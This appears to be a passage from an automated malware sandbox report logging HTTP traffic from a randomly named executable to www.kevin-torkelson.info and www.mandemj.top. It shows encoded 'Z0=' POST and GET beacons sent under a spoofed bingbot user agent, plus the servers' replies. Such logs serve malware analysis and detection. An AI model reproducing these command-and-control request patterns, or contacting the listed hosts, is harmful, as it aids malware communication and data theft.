                            Data Raw: 5a 30 3d 30 78 65 44 37 39 54 4f 48 33 6d 67 6e 44 65 58 4e 79 55 64 4c 6e 50 38 43 57 58 2b 63 72 75 63 76 47 71 4d 72 39 54 63 68 58 61 4d 54 6c 73 62 53 75 43 35 4d 4f 66 51 55 32 38 5a 4b 65 53 46 50 51 30 69 73 6c 32 52 76 52 57 61 49 63 67 50 37 56 32 61 58 56 6e 46 6b 6b 72 6b 35 4d 2b 6c 75 63 54 38 5a 72 6a 5a 75 42 6c 5a 2b 79 4e 4f 67 66 38 6b 65 31 59 44 54 37 6c 48 42 43 32 66 43 4d 6d 59 35 70 51 79 54 78 52 50 6c 4d 6c 48 75 42 6e 7a 38 4d 34 68 59 52 50 67 63 6e 4f 65 43 50 37 56 69 42 4f 55 63 49 43 42 6b 62 61 79 49 6e 70 37 59 56 46 38 39 63 39 73 4c 6f 6d 75 6c 44 2f 4f 66 65 62 72 75 41 79 4c 49 66 30 4c 6b 7a 70 6a 79 73 64 45 72 65 77 54 37 64 30 4a 35 4a 45 46 47 6e 51 3d
                            Data Ascii: Z0=0xeD79TOH3mgnDeXNyUdLnP8CWX+crucvGqMr9TchXaMTlsbSuC5MOfQU28ZKeSFPQ0isl2RvRWaIcgP7V2aXVnFkkrk5M+lucT8ZrjZuBlZ+yNOgf8ke1YDT7lHBC2fCMmY5pQyTxRPlMlHuBnz8M4hYRPgcnOeCP7ViBOUcICBkbayInp7YVF89c9sLomulD/OfebruAyLIf0LkzpjysdErewT7d0J5JEFGnQ=


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.749720208.91.197.27806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:25:13.708141088 CEST1674OUTPOST /gekb/ HTTP/1.1
                            Host: www.kevin-torkelson.info
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.kevin-torkelson.info
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.kevin-torkelson.info/gekb/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 30 78 65 44 37 39 54 4f 48 33 6d 67 6e 44 65 58 4e 79 55 64 4c 6e 50 38 43 57 58 2b 63 72 75 63 76 47 71 4d 72 39 54 63 68 57 4f 4d 50 47 6b 62 54 4e 61 35 4e 4f 66 51 58 32 38 45 4b 65 53 49 50 51 73 63 73 6c 71 37 76 54 65 61 4a 36 73 50 39 6b 32 61 4d 46 6e 46 76 45 72 6c 6b 38 2b 4b 75 63 6a 6a 5a 72 7a 5a 75 42 6c 5a 2b 77 46 4f 77 65 38 6b 59 31 59 41 46 4c 6c 54 46 43 32 33 43 4d 76 6a 35 70 55 59 54 42 78 50 6c 6f 4a 48 70 7a 50 7a 39 73 34 6a 5a 52 4f 6e 63 6e 4c 5a 43 4c 6a 7a 69 43 53 79 63 4b 53 42 6b 36 7a 39 51 45 52 6b 4f 57 67 70 39 64 78 36 46 4f 4f 63 38 77 62 46 5a 35 4c 54 72 6e 47 72 51 38 4d 4c 71 45 73 67 69 39 68 4c 6a 75 77 6d 31 35 35 6c 36 72 41 52 59 68 53 44 42 54 30 37 63 34 72 55 73 71 4b 70 33 78 53 51 71 6f 6a 71 47 47 31 5a 32 70 76 73 6e 47 64 6f 47 52 53 30 38 6d 7a 33 5a 42 6f 77 42 7a 6d 46 58 41 68 65 69 51 32 7a 47 61 6f 4c 2b 2b 2b 77 33 4b 64 74 49 7a 46 50 43 2b 38 45 72 39 48 50 6e 4d 6f 5a 65 68 79 52 61 6f 67 63 47 6b 79 4a 66 4f 53 2b 46 70 52 [TRUNCATED]
                            Data Ascii: Z0=0xeD79TOH3mgnDeXNyUdLnP8CWX+crucvGqMr9TchWOMPGkbTNa5NOfQX28EKeSIPQscslq7vTeaJ6sP9k2aMFnFvErlk8+KucjjZrzZuBlZ+wFOwe8kY1YAFLlTFC23CMvj5pUYTBxPloJHpzPz9s4jZROncnLZCLjziCSycKSBk6z9QERkOWgp9dx6FOOc8wbFZ5LTrnGrQ8MLqEsgi9hLjuwm155l6rARYhSDBT07c4rUsqKp3xSQqojqGG1Z2pvsnGdoGRS08mz3ZBowBzmFXAheiQ2zGaoL+++w3KdtIzFPC+8Er9HPnMoZehyRaogcGkyJfOS+FpRl2p9GTmzC2dRW5xKViXw1F8+BoZCgPy0I5HTFSQIEre9SEnpxHdMwrZVWho6c2wS8ofof18RtruEKR5y/9EBAWG40CU2fVeLGHqwVx5G0N2SuY4HZ71pcFYfzyt/gX9R2GSYe26HYW/yNAyF3PPCBnXTcw9aVrG4ePzcRv7BaJJoDF1UqzXdFbxnp4mFIw3g5ctmdqXSYpSKivfjWeUo4YIZXM+zfEC8TJfbAkwt3PdZVCErvEBwkh4tFa4YrtG3S8p8k0StEJMjdM2BsGcRjHYbw3YdkQA4y0xZTADzdTMGDhBn/CgP5mt142SXyV1fFr9JR+GMUz60O1qMv2yDUJvDK97Qy1dAb4BgGwKZXxnMxHVIjK+gdpi9LxvT5IEQcEcYodt4Cw+ojTLs0Od8lUDb6YzRS5gHDrldWdyk/+qaGGs4vbheYVeK8rkcyJzc/DwQ1rsJHf62Tk+gjHL7hdS+yUIF3kG833H6++bvBzbJnB+Y9BzSPY3xyysJRfThca5krRrc5NBr9qIyZqsYZ8q4AcKLCyZoIABGH1O2cNs7zISCiW/Kxhj1rXfbNqUv6Ohz+d5VkHDE+6vVa4BQbXrLZQDRHE+7WE5R6BJx1hRBuVlUjloo5X/cUiaxIr0osdmtJ6sY7WdJyXlH2ygRrRa9gvzG9GyVKN [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.749721208.91.197.27806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:25:16.256067038 CEST361OUTGET /gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ HTTP/1.1
                            Host: www.kevin-torkelson.info
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:25:50.532761097 CEST1236INHTTP/1.1 200 OK
                            Date: Thu, 26 Sep 2024 13:25:50 GMT
                            Server: Apache
                            Referrer-Policy: no-referrer-when-downgrade
                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                            Set-Cookie: vsid=902vr474902750372110466; expires=Tue, 25-Sep-2029 13:25:50 GMT; Max-Age=157680000; path=/; domain=www.kevin-torkelson.info; HttpOnly
                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XvmJoWHVDogSnXdjXY/62iVWGynTob7SSp1QJFdp6Ha2eQs0rimmRsCxelX+j/LOWkcoqxnfw+iQghU6wSjw1g==
                            Transfer-Encoding: chunked
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                            Data Raw: 31 36 35 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72
                            Data Ascii: 1651e<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager
                            Sep 26, 2024 15:25:50.532783031 CEST1236INData Raw: 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f
                            Data Ascii: .net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid
                            Sep 26, 2024 15:25:50.532808065 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74
                            Data Ascii: unction(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="lang
                            Sep 26, 2024 15:25:50.532824039 CEST1236INData Raw: 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61
                            Data Ascii: languages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.h
                            Sep 26, 2024 15:25:50.532942057 CEST781INData Raw: 22 26 22 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26
                            Data Ascii: "&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}
                            Sep 26, 2024 15:25:50.532958984 CEST1236INData Raw: 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 2d 61 62 22 2c 22 31 22 29 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e
                            Data Ascii: .type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t
                            Sep 26, 2024 15:25:50.532974005 CEST1236INData Raw: 65 3d 62 2e 6c 65 6e 67 74 68 7d 62 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 65 2c 62 2e 6c 65 6e 67 74 68 29 7d 72 65 74 75 72 6e 28 66 29 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61
                            Data Ascii: e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"st
                            Sep 26, 2024 15:25:50.532989025 CEST1236INData Raw: 74 65 6e 65 72 49 64 3a 63 2c 64 61 74 61 3a 74 72 75 65 2c 70 69 6e 67 44 61 74 61 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e
                            Data Ascii: tenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemove
                            Sep 26, 2024 15:25:50.533006907 CEST1236INData Raw: 5f 74 63 66 61 70 69 28 62 2e 63 6f 6d 6d 61 6e 64 2c 62 2e 76 65 72 73 69 6f 6e 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 74 63 66 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63
                            Data Ascii: _tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;win
                            Sep 26, 2024 15:25:50.533023119 CEST1236INData Raw: 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 74 63 66 61 70 69 4c 6f 63 61 74 6f 72 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e
                            Data Ascii: mp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cm
                            Sep 26, 2024 15:25:50.539412975 CEST1236INData Raw: 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 36 32 30 27 20 62 3d 27 33 33 35 36 35 27 20 63 3d 27 6b 65 76 69 6e 2d 74 6f 72 6b 65 6c 73 6f 6e 2e 69 6e 66 6f 27 20 64 3d 27 65 6e 74 69 74 79 5f 6d
                            Data Ascii: meta name="tids" content="a='29620' b='33565' c='kevin-torkelson.info' d='entity_mapped'" /><title>Kevin-torkelson.info</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script type="text/javascript">(window.NREUM||(


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.749722162.0.238.43806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:25:56.109569073 CEST614OUTPOST /to69/ HTTP/1.1
                            Host: www.mandemj.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.mandemj.top
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.mandemj.top/to69/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 75 6c 5a 37 4c 52 56 55 75 36 4b 35 34 31 63 59 51 62 33 57 54 52 55 32 43 54 6f 4f 6a 38 5a 49 5a 79 55 6d 78 5a 4a 75 52 4b 2f 54 67 35 65 58 6a 6d 45 6e 6f 30 71 54 32 35 62 49 65 6c 4f 57 62 73 68 33 35 31 31 4c 54 6a 55 54 5a 65 66 6c 52 6a 48 65 64 4c 6c 76 70 38 2b 37 6e 31 6d 30 36 6c 52 56 43 30 42 6c 37 6b 43 65 4d 47 51 34 69 61 56 41 38 66 4f 70 42 6b 5a 32 30 4e 61 69 4b 2f 62 66 63 64 53 75 74 70 55 37 50 49 56 67 42 66 38 41 72 79 4e 38 59 4e 64 78 75 41 69 43 56 39 47 73 49 76 7a 34 30 61 58 42 50 78 62 6a 59 58 6a 50 69 4f 6e 36 35 73 43 31 41 53 6d 4b 6f 36 62 44 4d 4d 6e 41 4c 76 46 72 2f 4e 31 7a 67 41 3d 3d
                            Data Ascii: Z0=ulZ7LRVUu6K541cYQb3WTRU2CToOj8ZIZyUmxZJuRK/Tg5eXjmEno0qT25bIelOWbsh3511LTjUTZeflRjHedLlvp8+7n1m06lRVC0Bl7kCeMGQ4iaVA8fOpBkZ20NaiK/bfcdSutpU7PIVgBf8AryN8YNdxuAiCV9GsIvz40aXBPxbjYXjPiOn65sC1ASmKo6bDMMnALvFr/N1zgA==
                            Sep 26, 2024 15:25:56.710685015 CEST533INHTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:25:56 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.749723162.0.238.43806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:25:58.664242029 CEST634OUTPOST /to69/ HTTP/1.1
                            Host: www.mandemj.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.mandemj.top
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.mandemj.top/to69/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 75 6c 5a 37 4c 52 56 55 75 36 4b 35 35 56 73 59 58 39 2f 57 56 78 55 35 4e 7a 6f 4f 74 73 5a 55 5a 79 6f 6d 78 62 6b 31 52 63 58 54 6e 63 69 58 69 6a 6f 6e 70 30 71 54 75 70 62 4e 42 56 4f 42 62 73 74 46 35 78 31 4c 54 6a 41 54 5a 63 33 6c 53 55 62 5a 66 62 6c 68 67 63 2b 35 34 46 6d 30 36 6c 52 56 43 33 39 50 37 6b 61 65 51 6d 67 34 6a 37 56 44 69 76 4f 71 57 55 5a 32 6c 64 61 35 4b 2f 62 70 63 64 69 45 74 73 51 37 50 4e 70 67 42 4f 38 42 2b 43 4d 31 46 39 63 6b 71 53 7a 35 66 50 4f 75 50 75 58 73 78 72 66 38 4b 48 47 42 43 31 76 6a 38 66 66 42 39 75 6d 44 58 30 37 2f 71 37 66 62 42 75 54 68 55 59 67 42 79 66 55 33 32 39 4a 78 56 75 50 4d 74 69 46 30 78 39 38 4a 6e 35 5a 44 35 5a 30 3d
                            Data Ascii: Z0=ulZ7LRVUu6K55VsYX9/WVxU5NzoOtsZUZyomxbk1RcXTnciXijonp0qTupbNBVOBbstF5x1LTjATZc3lSUbZfblhgc+54Fm06lRVC39P7kaeQmg4j7VDivOqWUZ2lda5K/bpcdiEtsQ7PNpgBO8B+CM1F9ckqSz5fPOuPuXsxrf8KHGBC1vj8ffB9umDX07/q7fbBuThUYgByfU329JxVuPMtiF0x98Jn5ZD5Z0=
                            Sep 26, 2024 15:25:59.236140013 CEST533INHTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:25:59 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.749724162.0.238.43806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:26:01.336790085 CEST1647OUTPOST /to69/ HTTP/1.1
                            Host: www.mandemj.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.mandemj.top
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.mandemj.top/to69/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 75 6c 5a 37 4c 52 56 55 75 36 4b 35 35 56 73 59 58 39 2f 57 56 78 55 35 4e 7a 6f 4f 74 73 5a 55 5a 79 6f 6d 78 62 6b 31 52 63 76 54 67 71 57 58 6a 41 51 6e 75 30 71 54 77 35 62 4d 42 56 4f 41 62 76 63 4f 35 78 78 78 54 6d 45 54 4c 76 50 6c 47 32 7a 5a 57 62 6c 68 69 63 2b 34 6e 31 6d 68 36 6c 42 52 43 33 74 50 37 6b 61 65 51 6b 34 34 6b 71 56 44 67 76 4f 70 42 6b 5a 71 30 4e 62 57 4b 2f 7a 35 63 63 57 2b 74 66 59 37 50 74 5a 67 53 73 6b 42 69 53 4d 33 47 39 64 6e 71 53 2f 6d 66 50 54 52 50 75 7a 47 78 6f 2f 38 4a 7a 33 2f 59 52 69 37 75 66 66 64 6a 2b 36 67 42 56 37 73 6d 4e 6a 59 4f 2f 72 38 4a 34 6b 33 78 73 77 49 34 34 49 57 45 4d 50 64 6e 67 52 52 2f 4e 46 73 32 6f 4a 59 6a 5a 64 35 63 63 71 6f 4f 70 70 72 53 76 65 7a 67 54 6d 39 61 33 76 32 35 63 36 43 6e 6b 50 52 42 45 31 33 73 58 5a 4a 6f 77 75 54 47 4e 61 53 52 43 45 38 57 4c 32 2b 76 59 48 50 50 6b 73 4c 6b 78 44 6c 65 77 42 79 77 4d 6e 59 42 32 70 2f 44 66 74 53 2b 7a 58 6f 43 47 44 4e 36 68 38 4b 66 78 52 59 2b 57 52 35 55 33 34 [TRUNCATED]
                            Data Ascii: Z0=ulZ7LRVUu6K55VsYX9/WVxU5NzoOtsZUZyomxbk1RcvTgqWXjAQnu0qTw5bMBVOAbvcO5xxxTmETLvPlG2zZWblhic+4n1mh6lBRC3tP7kaeQk44kqVDgvOpBkZq0NbWK/z5ccW+tfY7PtZgSskBiSM3G9dnqS/mfPTRPuzGxo/8Jz3/YRi7uffdj+6gBV7smNjYO/r8J4k3xswI44IWEMPdngRR/NFs2oJYjZd5ccqoOpprSvezgTm9a3v25c6CnkPRBE13sXZJowuTGNaSRCE8WL2+vYHPPksLkxDlewBywMnYB2p/DftS+zXoCGDN6h8KfxRY+WR5U341nJm2I5nQoofuHPok7EtBrXCcdt1Qaxlmmwp3OVtIxuTUum0S7teF7t5SeVL60zlbyftLyRom4s6CGmUSemxSPDxZEQnHmPjAfY3wV7Ii2UbLnnjT3EWqMYjPKF+CuVl6mTvpUf2A1S7LBMaK2H2RmrjysGZamsUSr9T4n9XOAPtjKlIFve6C/8bJdGI9fmMt3eFVUp32+WH1SHfviUEAyXPk1Wt2gIhHbUFTq+MozHfzharvwz5VtMeqKzgYdaE54FNsHPf05hTHGyYcH8CchiTZ97VmIHBvey0Xv3ouaG+ZmObVr9xtyLQOFXGQRjY2p4erPb9vLq9IDC7bGBFL9ScWKl6MH5fEW9hGG04y8Mcuccu7XOnhE+LfqjfW8l450chrYv1xwjeiOTzHNapb06EENBks7SqxhR0nmxXAUFgqJS9e3ULgPswbtsvQ8B9NOesD8CsGwJZzjZ1dGB17R+koJRNgDleY9almn67tIx3fXMNVu4